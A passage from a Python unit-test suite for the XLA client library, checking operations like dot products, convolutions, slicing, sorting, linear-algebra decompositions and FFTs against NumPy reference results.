"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
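# A reading of the tuple passed to make_dot_dimension_numbers above (inferred
# from this usage rather than from documentation): it is
# ((lhs_contracting, rhs_contracting), (lhs_batch, rhs_batch)), so
# (([2], [1]), ([0], [0])) contracts lhs dim 2 against rhs dim 1 and batches
# over dim 0 of both operands, i.e. a batched matmul taking shapes
# (10, 3, 4) x (10, 4, 5) to (10, 3, 5), matching np.matmul(lhs, rhs).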
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testApproxTopK(self):
if self.backend.platform != "tpu":
self.skipTest("ApproxTopK is only supported on TPU")
k = 10
qy_size = 256
db_size = 3000
feature = 128
recall_target = 0.95
b = self._NewComputation()
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Gt(p0, q0)
comparator = b.build()
qy_shape = [qy_size, feature]
db_shape = [feature, db_size]
rng = np.random.RandomState(0)
qy_arg = rng.randn(*qy_shape).astype(np.float32)
db_arg = rng.randn(*db_shape).astype(np.float32)
b = self._NewComputation()
qy = ops.Parameter(b, 0, xla_client.shape_from_pyval(qy_arg))
db = ops.Parameter(b, 1, xla_client.shape_from_pyval(db_arg))
scores = ops.Dot(qy, db)
iota = ops.Iota(
b,
xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
(qy_size, db_size)), 1)
init_val = ops.Constant(b, np.float32(-1))
init_arg = ops.Constant(b, np.int32(-1))
ground_truth = ops.TopK(scores, k=k)
approx_topk = ops.ApproxTopK(
b, [scores, iota], [init_val, init_arg],
top_k=k,
reduction_dim=1,
comparator=comparator,
recall_target=recall_target)
ops.Tuple(b, [
ops.GetTupleElement(ground_truth, 1),
ops.GetTupleElement(approx_topk, 1)
])
results = self._Execute(b, [qy_arg, db_arg])
ground_truth_docids = [set(x) for x in results[0]]
hits = sum(
len(
list(x
for x in approx_topk_per_q
if x in ground_truth_docids[q]))
for q, approx_topk_per_q in enumerate(results[1]))
self.assertGreater(hits / (qy_size * k), recall_target)
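# The assertion above estimates recall as the fraction of approximate top-k
# document ids that also appear in the exact top-k for the same query,
# pooled over all qy_size queries (hence the division by qy_size * k), and
# requires that estimate to beat recall_target.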
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
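# Gather sketch for the dimension numbers above (a reading of the XLA gather
# semantics, offered as a hedge rather than a spec): each length-2 vector of
# `indices` along index_vector_dim=2 picks a start (row, col) through
# start_index_map=[0, 1], and slice_sizes=[1, 1] extracts a single element,
# e.g. (0, 2) selects a[0, 2] == 2 and (2, 1) selects a[2, 1] == 7; the two
# size-1 offset dims plus the (2, 2) batch of index vectors give the
# expected (2, 1, 1, 2) result shape.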
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
